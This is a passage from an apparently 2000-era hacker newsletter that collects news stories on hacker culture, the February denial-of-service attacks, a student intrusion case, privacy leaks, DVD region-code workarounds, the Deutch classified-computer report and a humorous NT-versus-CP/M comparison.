      rush to find someone on whom to put the blame. It stands to reason that 
      whoever catches the person or people responsible will take all       the 
      glory and bask in the media spot light, not only helping their career, but 
      the company who they work for in this time of the "online security arms 
      race."

      Who will be next to step forward and offer someone else to the FBI? I 
      wouldn't be surprised if it was the Psychic Hotline. I also wouldn't be 
      surprised if the people who were responsible for these attacks were never       
      found.

      Bronc Buster is a California-based hacker who can be reached at 
      bronc@thesynthesis.com
      
      
      -=-
      
      Washington Post;
      
      The Code of the Hacker
      Those Who Broke In When The Web First Was Spun Say
      'Script Kiddies' Are Ruining Their Image

      By Libby Copeland
      Washington Post Staff Writer
      Friday, February 18, 2000; Page C01 

      Sometimes when he's playing pool, the answers come.

      He gets a Bass Ale and a cue. He and his roommate play this complicated
      version--instead of predicting the next shot, each has to predict the next
      three shots--and as the white ball spins and Jeff Fay racks up points, he
      gets these epiphanies.

      Like, how to crack a certain e-commerce site. Say a hacker intercepted a
      customer making purchases at an Internet commerce site, and he wants to
      figure out the password that would let him sneak into the system and
      access the company's financial information. He's got a computer hooked
      up to run all the possible passwords in hopes of finding the one, but the
      process takes so darn long, the customer will probably log off before the
      hacker cracks the code.

      Here's where Jeff Fay's revelation comes in. What if the interloper could
      inject a packet of information that would temporarily pause the connection
      between the customer and the company? Through a series of these pauses,
      the hacker could slow the customer's transaction--possibly buying himself
      enough time to crack the code.

      Voila. 

      "I think it's fairly elegant," Fay says, the dimple on his right cheek twinkling
      as he stands by his gray office cubicle in Reston. He's flush with pride,
      even though he'll never carry out this scheme. It's just the way his mind
      works: He loves a puzzle; he loves math. He takes pleasure in having a
      fast, tensile mind. He finds a nice piece of code aesthetically satisfying.

      All of which makes the denial-of-service attacks that hit Yahoo, CNN,
      E-trade and other sites last week particularly abhorrent to him.

      "A bunch of script kiddies flexing their muscles," Fay says, his disdain
      evident. There's little commonality between true hackers and "the
      14-year-old who can't spell Windows NT."

      Fay considers himself a true hacker. His work, he says, derives from
      technical expertise and creative inspiration. He and others, who came of
      age in the early- and mid-'90s, when the Internet was still nascent, see a
      gulf between themselves and younger Net newbies, who don't seem to
      respect the technology.

      Those "script kiddies." You know the stereotype: the lonely,
      acne-encrusted teen with little technical skill but plenty of vengeance who
      uses tools written by others to muscle into Web sites. Fay and others scoff
      when folks call these kids "hackers." The culprits in last week's Web
      attacks may or may not fit this description. The motive could have been
      political, rather than adolescent thrill-seeking, and experts quibble over the
      culprits' technical expertise. But many hackers say a great amount of
      Internet vandalism is juvenile stuff, the equivalent of picking a sprung lock.

      The beauty of hacking is lost on these low-level intruders, Fay says. Fay
      himself earned his street credibility by dabbling in underground ("black
      hat") hacking in college, and now, as a "white-hat" hacker, he earns money
      defending the security of Web sites and software.

      His complaints sound like the familiar tale of one generation denigrating the
      next, except he is only 24--not much older than the kids he scoffs at. But
      generational differences can develop in just a few years in the collapsed
      chronology of the cyberworld. This is about the old--no, older--hackers
      vs. the new.

      Hacking is not a phenomenon of the Internet age. In his 1984 book,
      "Hackers: Heroes of the Computer Revolution," Steven Levy writes of the
      original computer hackers, MIT University students who in the late '50s
      and early '60s secretly infiltrated an IBM mainframe to learn its inner
      workings. Their definition of the hack--"imbued with innovation, style, and
      technical virtuosity," as Levy writes--formed the intellectual soil upon which
      Internet age hacking would grow.

      A fine mind and a criminal intention are not mutually exclusive. Some good
      hackers have also been good thieves. In 1994 a Russian hacker
      transferred millions of dollars out of Citibank into various accounts. Last
      year a hacker (also Russian) stole credit card numbers off a music retailer's
      site and tried to ransom them.

      There have also been plenty of politically motivated attacks, not the least of
      which may have been last week's. Bruce Sterling, one of the early
      chroniclers of hacker culture, says the Yahoo bombardment takes a page
      from '60s dissidents like Abbie Hoffman, who once dropped money onto
      the floor of the New York Stock Exchange. The brokers dove for the
      money. It proved, to Hoffman, their crass materialism.

      Nevertheless, Sterling adds, in terms of technical expertise, last week's
      attacks were "as dumb as a bag of hammers."

      "Most of the attacks tend to be not really highly sophisticated," says Elias
      Levy, chief technology officer with SecurityFocus.com, a West Coast
      company. As for motivation, Levy says, "most of the attacks tend to be for
      pure acceptance within the hacker community. Sadly, a lot of the time the
      political message is only an afterthought."

      It's not surprising that the hacking culture is changing. In the early '90s,
      those who had access to the developing Internet were often university
      students with connections to computer science. Nowadays, the pool of
      Internet users is far greater, and, as Sterling points out, unfettered access
      to the Internet is the province of middle- and upper-class teenagers.

      Once, says Jeff Moss, who runs the West Coast hacker conventions
      DefCon and Blackhat, hackers were a community. There was a
      give-and-take. There were relationships. "Nobody would share
      information with you if you didn't share information back," he says. "Now
      the problem is, knowledge isn't being traded as little tidbits. It's available
      for free, and so there's no natural screening process. And there's no
      socialization."

      Imagine. Hackers--who usually seem to operate outside the
      law--preaching socialization and all its implications: responsibility, ethics.

      This is a familiar plot: The aristocracy crumbles when the gates open and
      commoners rush in. In the words of Jim Thomas, a professor at Northern
      Illinois University who also runs an online journal of the computer
      underground, you "have a diversity of people, and unfortunately they begin
      to reflect the general population much more. You get your bozos."

      There's no denying that hackerdom has long offered a mystique, and
      mystique is the equivalent of catnip for teenagers. To be righteous,
      misunderstood and powerful--that amounts to glory in the adolescent
      world.

      So, to amend a phrase from the ever-popular show, "Who Wants to Be a
      Hacker"?

      Check the search engines. The Web is rife with Net newbies begging,
      "Teach me how to hack." Among the letters to the editor in the latest issue
      of the online hacker magazine Phrack, they plead:

      "Hi, I am a wannabe hacker . . . Where will i find material describing
      typical methods to test the systems for security[?]" Or, "i'm a future hacker
      to be for now i need info about a free server." Or, "I found my schools
      dial-up and I want you guys to try and hack it if you can . . . [Mess] it up
      as much as possible please!"

      When they do acquire tools, they often deface Web sites, leaving
      messages complete with misspellings, expletives and shout-outs that are
      reminiscent of early '80s graffiti wars.

      The paradox is that true hackers have provided the entry into this
      vandalism. "Gray hat" hackers, like the legendary group L0pht, which has
      now joined with the security firm @Stake in Cambridge, Mass., have
      frequently posted scripts that others used to break into Web sites. Jeff Fay
      himself has poked around for software bugs and posted them publicly--a
      common practice among hackers.

      Critics say this is like breaking into someone's house and leaving the door
      open, while robbers mill about on the street outside. But like most true
      hackers, Fay abides by the dictum "information wants to be free."
      Hackers, he says, do everyone a favor by pointing out soft spots and
      putting pressure on otherwise lax security administrators or software
      creators to fix things.

      "The people who are developing attacks and posting them, I don't consider
      them evil," he says. "They're really doing quality control," he says.

      In any case, many hackers say all of this is peripheral to their original
      intention. In the beginning, says Brian Martin, who is an editor with the
      hacker site attrition.org, "the whole goal [of hacking] was not to be
      discovered. . . . To go in, figure out how a system worked, and leave, just
      as quietly." The purpose was understanding.

      Fay understands these ambiguities. He's working for Infrastructural
      Defense, a company that provides Internet security. He and many of his
      hacker friends are now paid to hunt for vulnerabilities on behalf of their
      clients, and to fix them. On a shelf in his cubicle, he keeps "Cryptography"
      and "Applied Cryptography." 

      But he knows his roots originate in a smaller, more elite--and perhaps
      disappearing--society of hackers. Atop his wispy blond hair he wears a
      black cap that reads "2600," the name of a well-respected online hacker
      magazine. He also wears a hacker T-shirt that sarcastically reads, "I
      {heart} Feds." 

      Until, that is, he finds out that someone wants to interview him, and he
      dashes home to Kingstown to change into a plain white turtleneck. As if to
      reinforce the legitimacy of his art. 

       Copyright 2000 The Washington Post Company
      
      @HWA
      
71.0  HNN:Feb 21st:Student Charged with Breaking Into High School Systems
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by Dan 
      
      Jacy Kyle Johnson, 14, has been charged with accessing a computer
      network without authorization of the network owner after he allegedly
      broke into teacher grading files from a computer in the school library.
      Crystal River High School officials say they don't think he changed
      his or anyone else's grade, but he may have penetrated at least two
      firewalls too reach the compromised system.
      
      St.Petersburg Times
      http://www.stpetersburgtimes.com/News/021800/Citrus/Boy__14__charged_with.shtml
      
      Boy, 14, charged with hacking

           Authorities say he got into a server at
           Crystal River High School that contained
           teacher files, including students' grades.
           But they say he didn't change anything or
           damage the school's system. 
   
      By BILL VARIAN
   
       St. Petersburg Times, published February 18, 2000 
   
   
      CRYSTAL RIVER -- Jacy Kyle Johnson sometimes
      bragged to his friends that he could crack the school
      computer system and change his grades. 
   
      He is accused of doing a little more than boast. 
   
      Johnson, 14, is charged with hacking his way into teacher
      grading files almost two weeks ago from a computer in the
      Crystal River High School library. School officials say they
      don't think he changed his or anyone else's grade, but he may
      have penetrated at least two protective software layers in the
      computer called firewalls, which are designed to prevent
      such intrusions. 
   
      "The first thing we did is call in our district technical support
      people," Crystal River principal Craig Marlett said Thursday.
      "They're pretty confident he didn't change his grades. He was
      on his way, but didn't get quite into it." 
   
      Johnson was in juvenile court Thursday, where he faced a
      charge of accessing a computer network without
      authorization of the network owner -- computer hacking --
      stemming from his Feb. 7 arrest. He also faced three other
      charges related to alleged assaults on his mother and was
      ordered held at a juvenile detention center in Ocala for up to
      15 days while officials determine what to do with him. 
   
      Keith Schenck, staff attorney for the Circuit Court judges in
      Citrus County, said it is rare that someone has been charged
      with such an offense in this county. 
   
      "This may be the first one," he said. 
   
      However, the law under which Johnson is charged actually
      was created in 1978, he said. 
   
      The teen was found out after another student witnessed
      Johnson using a library computer to tap into school records
      and told a teacher. The teacher saw Johnson walk away in a
      hurry from the computer and checked it out, said Jeffery
      Smith, the assistant state attorney who handles juvenile
      offenders. 
   
      A school resource officer investigated the incident. He
      learned from school staff that Johnson had bragged about
      breaking into the school computer. Staff members also told
      him students were talking about paying Johnson to change
      their grades. 
   
      From the library computer, Johnson gained access to the
      computer server for authorized personnel. From there, he
      was able to look at teachers' files that include past and
      current grades, according to the school resource officer's
      report. 
   
      The officer, Deputy Ron Frink, said a school district
      technology specialist told him Johnson was in an area that
      took two security password clearances to penetrate. 
   
      Smith said the boy confessed. He also said it doesn't appear
      that Johnson actually changed any grades. 
   
      "I have no indication that there was anything other than him
      bragging happening," Smith said. 
   
      The computer hacking charge is a third-degree felony, and
      Johnson would have faced as many as five years in prison if
      convicted as an adult. Had he actually changed his grades,
      the charge would have been upgraded to a second-degree
      felony, which carries a prison term of up to 15 years. 
   
      Because he is charged as a juvenile, he faces a more limited
      penalty, which could include counseling. 

      
      
      @HWA 
      
72.0  HNN:Feb 21st:Japan To Increase Cyber Defense
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
       
      contributed by William Knowles 
      
      Ken Sato, administrative vice minister of The Defense Agency, said that
      they are planning to establish a unit in the Self-Defense Forces
      dedicated to combating cyber intrusions against key computer systems,
      as part of the five-year defense buildup program beginning in fiscal
      2001.
      
      The Daily Yomiuri
      http://www.yomiuri.co.jp/newse/0218cr06.htm
      (404)
      
      @HWA 
      
       
73.0  HNN:Feb 21st:Possible Privacy Violation in Apple's Sherlock
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/ 
      
       
      contributed by Arik 
      
      Apple's Sherlock, an Internet search technology, sends out users'
      e-mail addresses. This occurs when Sherlock, going into auto-update
      mode, searches for new versions of modules that enables it to search
      specific sites. When the update is sent via FTP Sherlock logs in,
      sending the users' e-mail address as the login password. (This is a
      known issue with FTP, that is why they invented SCP.)
      
      The Register UK
      http://www.theregister.co.uk/000218-000017.html
      
      
     Posted 18/02/2000 1:40pm by Tony Smith
   
     MacOS' Sherlock surreptitiously sends email
     addresses
   
     A security glitch that exposes users' email addresses has been found lurking within
     Apple's Sherlock Internet search technology. 
   
     The discovery comes a month after it was detected that Apple's iTools online service
     transmits users' passwords without scrambling them first. 
   
     The latest discovery was made by MacWelt magazine and Web site MacSherlock. In
     fact, it's not a glitch as such, rather it's a lack of thought on the part of Sherlock's
     programmers. 
   
     Sherlock has an auto-update facility which checks for new versions of modules that
     allow it to search specific sites. The Register itself has just such a plug-in that can be
     downloaded here. Our plug-in is provided through a Web server, but if the update is
     transferred by FTP, Sherlock will log in anonymously, but provide the user's email
     address as the login password. 
   
     In the past, it was considered courteous to provide your email address this way when
     downloading files anonymously. Nowadays, in these more privacy-conscious times,
     it's much less commonplace. In fact, many applications that support FTP, such as
     Netscape Navigator, allow users the choice as to whether their email address is
     transmitted this way. 
   
     Last month's security glitch centred on the iTools browser plug-in, which
     communicates with the server using XML. Software developer Brad Pettit discovered
     that the plug-in transmits the user's password as plain text. 
   
     "One could theoretically control the plug-in from any link that loads content into your
     Web browser. And you wouldn't even know it," he said. 
   
     Pettit also found the iTools software capable of "gathering and sending all sorts of
     machine-specific data to Apple, such as hardware ethernet addresses. 
   
      @HWA
      
74.0  HNN:Feb 22nd:Sympatico Quiet on Search for mafiaboy 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


      contributed by twilyght 
      Bell Canada's Sympatico Internet service, Canada's
      largest Internet service provider, refused to comment
      on weekend reports that police had searched the
      company's files for information about a user known as
      'mafiaboy', who has been linked to data attacks this
      month on e-commerce sites. After an accusation by
      Recourse Technologies Inc., that mafiaboy was based in
      Canada RCMP officials have searched the offices of
      other service providers in the area. 

      The Toronto Star 
      http://www.thestar.com/thestar/editorial/money/20000222BUS07b_FI-HACK.html
      (404)
      
      @HWA
      
75.0  HNN:Feb 22nd: ISPs Look at Customer Security as Low Priority 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by William Knowles 
      After the recent media hyped denial of service attacks
      against such major online sites as Yahoo, CNN, ZD Net
      and others, home users are becoming more and more
      concerned about their own security and are looking to
      their ISPs for help. ISPs say that they are doing the
      best that they can to respond to customer requests. 

      ZD Net      
      http://www.zdnet.com/zdnn/stories/news/0,4586,2444159,00.html?chkpt=zdhpnews01
      
      Web attacks: Are ISPs doing enough?

      Not according to many broadband customers
      and security experts.



      By Robert Lemos, ZDNet News
      UPDATED February 21, 2000 2:28 PM PT 



      Security experts and Internet users are becoming
      increasingly vocal about their concerns that
      high-speed Internet providers are not doing enough
      to ensure the data security of home users. 

      "It's been two months (since I notified my provider of three
      potential attacks)," wrote a Santa Clara, Calif.-based
      Web production manager to ZDNet News Talkback. "And
      I still haven't heard from (them). I'm not overly concerned
      about prosecuting hackers ... but I do care about my own
      privacy and the security of my system." 


      In the wake of the recent denial-of-service attacks against
      eight major Web sites, including ZDNet (NYSE: ZDZ),
      personal security has become less of an add-on and
      more of a must-have feature for Internet surfers. (See:
      Has your PC been hijacked?) 

      Customer security low priority
      Unfortunately, while high-speed Internet providers are
      intent on making their networks secure, they frequently
      overlook the security of their customers, said Jeremy
      Rauch, manager of vulnerability content and co-founder of
      security information site Security-Focus.com. 

      "Broadband ISPs don't seem to
      be doing a lot on the problem
      right now," he said. "They don't
      seem to be going out of their
      way to educate customers
      about the problem." 

      A recent example: Two months
      ago, said Rauch, Usenet
      newsgroups were ready to give
      the @Home Internet service the
      "death penalty" -- blocking any
      user from the @Home domain
      from posting to newsgroups. The
      reason? Spammers were
      sending e-mail out to the
      Internet using @Home
      customers' computers to
      camouflage the source. If the
      ISP had helped its users correctly configure their
      computers, the problem never would have happened, said
      Rauch. 

      Yet, providers insist that they are taking customers'
      security seriously. 

      'Eyes and ears open'
      @Home has learned from its checkered past, said
      Jacqueline Russo, spokeswoman for Excite@Home
      (Nasdaq: ATHM), and now has become more vigilant,
      adding a security page to its services sponsored by
      security software maker McAfee. "We are constantly
      keeping our eyes and ears open," she said. 

      Another problem for providers: Personal firewall programs
      have become quite popular with users. Many of those
      programs warn users of every little ping and port request,
      resulting in paranoid users who always think their PCs
      are under attack. 

      "These programs have taken off in the past six to eight
      weeks as more people are going out and looking for
      security," said Curtis Benton, network operations
      manager for Internet-over-DSL provider Flashcom
      Communications Inc. "Yet, people get too concerned over
      security sometimes, and they become convinced that
      anything attempting to contact their computer is coming
      from a malicious personality." 

      The result is a flood of e-mail to providers that is as
      debilitating as the denial-of-service attacks that hit the
      Web Feb. 7-9. 

      'A stack of complaints'
      "We have an abuse coordinator that has a stack of
      complaints that he has to determine whether are a
      serious threat or not," explained a system administrator
      for Road Runner, Time Warner Inc.'s high-speed Internet
      service, who asked to remain anonymous. "It would be
      hard to respond to every single complaint, especially
      when people are sending us their BlackICE logs and the
      like every day, and we have thousands of users." 

      In the week following the attacks on major Web sites,
      personal firewall maker Network ICE Inc. has seen
      requests for its product, called BlackICE, skyrocket by
      30 percent to 50 percent. Rival Zone Labs, maker of a
      free firewall called ZoneAlarm, has seen 400,000
      downloads of its program in the past week. 

      Greg Gilliom, CEO of Network ICE, admits that personal
      firewalls can generate a lot of alarms. "The problem (for
      providers) is that they don't have time to deal with every
      knock on a customer's door by script kiddies," he said.
      The next version of BlackICE will not explicitly tell users
      when it has blocked an attempt to access their PC,
      though it will log the incident. 

      Gilliom also stressed that broadband providers are getting
      better about integrating their customers' security with
      their own. "We are in discussion with several ISPs that
      are thinking about rolling out a security service," he said.
      "They can charge the end user $3 to $5. Later, as
      everyone starts doing security, it will just become part of
      the service." 

      Security: Let the user decide?
      That will let Internet providers tailor security to the needs
      of the user, said Shawn Dainas, spokesman for Pacific
      Bell Internet Services. 

      "Consumer have to
      decide if they need
      more security
      themselves," he said.
      "Just like in the real
      world, different people have different security needs --
      some may want to have a state-of-the-art security
      system, others may just need a dog." 

      In the meantime, users should not wait for the broadband
      providers to come to them, stressed David Davidson, a
      software engineer from Omaha, Neb., in a post to ZDNet
      News Talkback. 

      "(Don't) take your security for granted," he wrote. "Learn
      and protect yourself." 
      
      @HWA
      
76.0  HNN:Feb 22nd:Circumventing DVD Zoning 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/ 


      contributed by no0ne 
      The movie industry has divided the world into different
      DVD zones. A DVD made for a certain zone is not going
      to play or be recognized by DVD players in other zones,
      at least that was how it was supposed to be. People
      have found different ways of circumventing the zoning,
      detailing ways of how to make DVD players from certain
      regions read DVD's meant for other regions. 

      The Register UK       
      http://www.theregister.co.uk/000222-000008.html
      
      Posted 22/02/2000 2:15pm by Tony Smith
    
      How to hack Tesco's DVD player -- Register readers
      write
    
      Register readers are clearly a resourceful lot -- we've had stacks of email revealing
      just how Wharfedale's DVD player can be hacked to support DVDs from any of the
      regions into which the movie industry has divided the world (see Tesco slams
      'unnecessary' DVD zoning). 
    
      Well, Wharfedale admitted its player was "easily hackable", and it sure is. The trick is
      simple: open the player's tray, put a Region One disc on the tray, press the 0, 1, 2 and
      3 buttons on the remote control, and finally press Play on the remote. That closes the
      tray and from this point on the player will accept DVDs from any of the six main
      regions. 
    
      Thanks to reader Patrick for pointing out that the hack also works with the Proline
      DVD1000, the Bush DVD-2000, the Grundig GDV-200 and the Grundig GDV-210
      DVD players. 
    
      And Tony D notes that you can also "press pause on an Aiwa stereo remote whilst
      pointing at unit. You will see a mainenance screen. Set the region, and off you go. This
      works on my Wharfedale". 
    
      Readers Chris Dennis and Tom note that to convert the player back to Region Two
      only, the procedure is: open the tray, place a Region Two disc on the tray, press the
      Return button on the remote and finally press the remote's Play button. 
    
      Of course, there's probably little point in returning the player to its original state since,
      as reader Rob notes, "my DVD quite happily plays Region One and Region Two
      without difficulty". 
    
      Owners of Matsui DVD-110 player and the Schneider DVD-810 sold by Asda, there's
      a hack for them too, according to a number of readers. Simply press Menu, 9,
      Open/Close (note that the tray won't open at this point) and then 5 to call up a region
      selection screen. 
    
      And thanks to Andy Crawford for pointing out Web site DVD Reviewer, which lists
      pretty much all the machines currently available with simple multi-region hacks and
      reveals just how effective the hacks are -- not always, it seems, particularly with older
      players. 
    
      Kate Wolf dropped us a line to say that hi-fi specialist Richer Sounds offers an Ariston
      player that can also be easily hacked. And, according to Keith Kennedy and others,
      "90 per cent of all the DVD players sold in [Switzerland] are sold as region free". That
      said, this appears to be simply because stores send all their kit out for conversion
      before selling them on to the public. As Nick Barnes found: "Chatting to a staff
      member in Media Markt... he confirmed that stores buy X units from manufacturer Y
      and send them all to company Z that modifies them". 
    
      Rob White had problems with the Wharfedale DVD-750 he bought from Tesco and
      took it back (he didn't say whether he tried a replacement machine). Instead, he uses
      his PC and PowerDVD software which "easily defeats the zoning information, by the
      way, just by storing the zone in the registry". 
    
      DVD software region changing is tackled by DVD Informatrix (thanks to Phil
      Chambers for the link). 
    
      Matt Rix, meanwhile, provides a little anti-spin (in the great Register tradition). "Tesco
      had been selling the Wharfedale player for several months before Christmas, but due
      to very high demand it went out of stock," he notes. "So really, they're re-launching the
      old product line." So much for Tesco's 'sales trial' line. 
      
      @HWA
      
77.0  HNN:Feb 22nd:Voters Kill Filter Proposal 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by janoVd 
      While a majority of voters in Michigan cast ballots in
      favor of presidential hopeful John McCain, voters in the
      small town of Holland were also voting on whether to
      allow the public library to install filters on its computers.
      Residents of the small town voted 4,379 to 3,626
      against the proposal, which would have cut off funding
      to the library unless the filters were installed.
      Proponents of the measure have said that the defeat
      won't end their fight to get filters installed on the library
      computers. (The people have spoken, listen to them!) 

      Associated Press - via Boston Globe
      http://www.boston.com/dailynews/054/economy/Voters_defeat_measure_on_filte:.shtml
      
      (404)
      
      @HWA
      
78.0  HNN:Feb 22nd: Former CIA Director Regrets Security Breech 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      Former CIA Director John Deutch appeared before the
      Senate Intelligence Committee to answer questions
      regarding his use of computers at his home for classified
      material. There is no evidence that indicates his system
      was comprised during the time it was used May 1995 to
      December 1996. (Companies should learn from this
      when employees take their laptops home.) 

      Reuters - via Yahoo              
      http://dailynews.yahoo.com/h/nm/20000222/ts/cia_deutch_5.html
      
     Tuesday February 22 7:49 PM ET 
     Former CIA Chief Contrite Over Risky Computer Use

                      WASHINGTON (Reuters) - Former CIA Director John Deutch, 
                      who was found to have ``intentionally'' used nonsecure 
                      home computers to process secret reports, showed 
                      contrition when he went before a closed Senate hearing on                       
                      Tuesday.

                      Deutch was questioned by the Senate Intelligence 
                      Committee, which released a CIA report of its probe into 
                      Deutch's use of computers at his home for classified 
                      material while he served as CIA director from May 1995 to 
                      December                       1996.

                      The 77-page report, an unclassified version of an 86-page 
                      classified CIA report given to congressional intelligence 
                      committees last August, said Deutch ``continuously 
                      processed classified information on government-owned 
                      desktop                       computers configured for 
                      unclassified use during his tenure.''

      Examples of material found on Deutch's computers included memos to the 
      U.S. president and vice president containing top-secret information, 
      including information on official trips, the report of the CIA Inspector 
      General said.

      ``I acknowledged, and I apologized for, the mistakes I made in using 
      unclassified government computers for some of my classified work,'' Deutch 
      said after the hearing.

      ``At no time did I intend to violate security rules, and, fortunately, 
      there is no evidence of compromise,'' he said. ''The director of central 
      intelligence is not above the rules, and, indeed, the director of central 
      intelligence should be an example of respect for       security. I very 
      much regret my errors,'' he said.

      Deutch's Successor Criticized

      The report was critical of the investigation of Deutch and said his 
      successor, George Tenet, should have ``involved himself more forcefully to 
      ensure a proper resolution of this matter.''

      The CIA's director of public affairs, Bill Harlow, issued a statement 
      noting that Tenet had accepted the initial investigation was not conducted 
      well but stressing that the Inspector General had concluded that no one 
      had ``intentionally impeded'' it.

      ``We could have and should have done better,'' Harlow said.

      Deutch was stripped of his CIA and high-level Pentagon intelligence 
      clearances last August for mishandling classified information. Recently he 
      gave up his last remaining Pentagon clearances, which allowed him to work 
      on classified defense contracts.

      The report referred to a prior incident of the mishandling of classified 
      information that involved Deutch before he became CIA director. In the 
      early 1980s, while Deutch was on an advisory panel, he took a lie-detector 
      test that apparently showed he had not       been as careful in handling 
      classified material as he should have been, but the issue was resolved.

      ``It's Unusual Behavior''

      Richard Shelby, the Alabama Republican, who chairs the Senate Intelligence 
      Committee, said of Deutch's actions: ``It's unusual behavior, especially 
      where Dr. Deutch had been warned before regarding his misuse of classified 
      information. We know he's a       bright man, he's served the government a 
      long time, but he wasn't serving it very well when this went on.''

      The report said there was no evidence that any top-secret material had 
      been compromised despite the facts that a number of people had access to 
      the computers and the computers had Internet connections.

      But it concluded that Deutch had been told he was not authorized to 
      process classified information on nonsecure computers, which he had at his 
      Maryland and Massachusetts homes and his offices in the Old Executive 
      Office Building and CIA headquarters.       He also used a CIA-issued 
      unclassified laptop computer for classified information, the report said.

      ``Throughout his tenure as (CIA head), Deutch intentionally processed on 
      those computers large volumes of highly classified information (including) 
      Top Secret Codeword material,'' it said.

      ``All were connected to or contained modems that allowed external 
      connectivity to computer networks such as the Internet. Such computers are 
      vulnerable to attacks by unauthorized persons,'' the report said.

      Classified Information Retrieved

      ``CIA personnel retrieved (classified) information from Deutch's 
      unclassified computers and magnetic media related to covert action, Top 
      Secret communications intelligence and the National Reconnaissance Program 
      budget,'' the report said.

      Deutch had said other people who used the government computer in the study 
      of his Maryland home included his wife, who used it to prepare reports 
      relating to official travel with him, the Inspector General's report said.

      Another family member used that computer to access a university library. A 
      maid who worked at the Deutches' Maryland home and was a resident alien in 
      the United States was allowed ''independent access to the residence'' 
      while the family was away and       had the alarm-deactivation code for 
      the home.

      ``CIA security database records do not reflect any security clearances 
      being issued to the alien,'' who obtained U.S. citizenship in 1998, the 
      report said.

      Deutch used an online identity that was a variation of his name, and he 
      was listed by his real name in the Internet service provider's publicly 
      available online membership directory, the report said.

      ``Deutch's online identities used during his tenure (as director of 
      central intelligence) may have increased the risk of electronic attack,'' 
      it said.

      The CIA and Pentagon are conducting separate reviews of the material found 
      on Deutch's home computer to assess what might have been compromised if an 
      outsider had accessed it.

      Shelby faulted the CIA for not conducting such an assessment sooner and 
      Tenet for having been too slow to inform the panel.

      ``All this happened on (Tenet's) watch,'' Shelby said of the Deutch 
      investigation. ``This I do not believe was Mr. Tenet's finest hour.'' 

     @HWA
      
79.0  HNN:Feb 22nd:New Version of DeCSS Available 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Odin 
      We reported on this last week but the mainstream is
      finally catching up. A small utility called "DeCSS" that
      strips Cascading Style Sheet tags from an HTML
      document has been released. It is hoped that people will
      download, post and link to this version in an effort to
      confuse and confound the MPAA lawyers. 

      Salon
      http://www.salon.com/tech/log/2000/02/22/decss/index.html
      
      DeCSS 
      http://pigdog.org/decss
      
      @HWA
      
80.0  HNN:Feb 22nd:  Windows-NT vs. CP/M 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Dan 
      This may be old but it is too funny not to post.
      Microsoft has come out with a number of benchmarks
      and comparison papers championing the fact that
      Windows-NT is much better than every other operating
      system. But is it better than CP/M? Yes, CP/M. One of
      the first personal computer operating systems. (And the
      one I first used on an Osborne One) 

      Windows-NT vs. CP/M 
      http://www.oualline.com/col/cpm.html
      
      Windows-NT vs. CP/M

      Microsoft has come out with a number of benchmarks and comparison papers 
      championing the fact that Windows-NT is much better than Linux. I find 
      such comparisons fascinating, but rather than rehash this argument, I've 
      decided to create my own comparison. Not of Windows-NT vs. Linux, that's 
      been done. But of Windows-NT vs. CP/M. 

      CP/M for those of you who don't remember was one of the first portable 
      operating systems. It ran on 8 bit 8080 class hardware, and was a single 
      user, floppy based system. (Later versions actually could access a hard 
      drive.) 

      Two systems were selected for this comparison. The CP/M system is a 
      Kaypro-II running a 2MHZ Z80, with 64K of memory and dual 360K 5-1/4 
      floppies. The Windows-NT system runs quad 500 MHZ Pentium Processors, with 
      2GB of memory and 1TB       of disk space. This particular configuration 
      was chosen because Microsoft seems to like to use a system like this for 
      all its benchmark comparisons. 

      Performance

      Performance is one key issue in any comparison. I do a lot of writing, so 
      word processing performance is extremely important to me. The CP/M system 
      with Word* and after a 15 second boot Word* let me write documents as fast 
      as I could type. In my two       minute test, I could enter about 210 
      words. 

      The Windows-NT system running Microsoft Word also could accept input as 
      fast as I could type, but it took a whole minute to boot up. Thus I could 
      enter only 120 words in my test. So we can conclude that CM/P is 75% 
      faster than Windows-NT for word       processing. 

      Let's talk about spreadsheet performance. CP/M with Calc* will balance my 
      checkbook just as fast as I can input the data. Counting the boot time, 
      that means that I can enter about 17 transaction in a two minute test. 
      With Windows-NT with Excel, I get only       10 transactions a second. So 
      as far as spreadsheet performance goes, CP/M is 70% faster than 
      Windows-NT. 

      Conclusion: CP/M provides superior overall performance for common office 
      applications. 

      Security

      CP/M is an extremely secure system. It relies on the physical security 
      methodology. You store the operating systems, programs, and private date 
      on 5-1/4" floppies. You want to use them, put them in the machine. No one 
      can get to your data from the outside       through a network because CP/M 
      has no network. You want to secure your data, take the floppies out and 
      lock them up. Want to share data, hand the floppies to another person. 
      Note: This security method allows the user a wide variety of personal 
      authentication schemes such as drivers license, passport, or personal 
      friend know to you. 

      What's even better since we are running on a two floppy system, we can put 
      our software on one floppy and the data on the other. The software floppy 
      can be write protected, and nothing we do can change any of those files. 

      Windows-NT relies on file system security and passwords. There have been 
      lots of studies about the weaknesses of passwords. Any system that relies 
      passwords in insecure. In addition Windows-NT contains a tremendous 
      security hole called the       Administrator account. Anyone logged in to 
      this account can easily read and write all your files. 

      Add to that that Windows-NT connects to a network and allows remote access 
      and you have big security problems. There have been hundreds of reported 
      security problems reported for Windows-NT such as viruses, E-Mail viruses, 
      break ins, denial of       service attacks, and many others. None of these 
      problems have affected CP/M. 

      Plus Microsoft relies on operating system file protection to keep you from 
      modifying system files. This means that you must know what files to 
      protect and rely on software to provide your protection. Hardware 
